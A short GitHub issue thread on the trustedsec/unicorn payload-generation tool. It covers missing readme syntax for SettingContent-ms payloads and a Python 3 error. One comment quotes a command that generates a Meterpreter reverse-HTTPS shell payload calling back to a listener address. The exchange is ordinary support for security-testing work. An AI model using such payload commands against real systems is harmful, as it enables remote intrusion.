### ISSUE TITLE
. Settingscontentms

### ISSUE THREAD

**Issue by moaeddy** [trustedsec/unicorn#73]
You did not include build syntax for SettingscontentMs

**Comment by yangshuangfu** [comment]
When i run "python3 unicorn.py windows/meterpreter/reverse_https 192.168.131.1 443",some wrong as follow:
 Something went wrong, printing the error: name 'reduce' is not defined....

**Comment by trustedsec** [comment]
I updated the readme to include the Settingcontent-ms, its actually in the command line though so it was included there for syntax. Now in readme.

For @yangshuangfu - use python2.
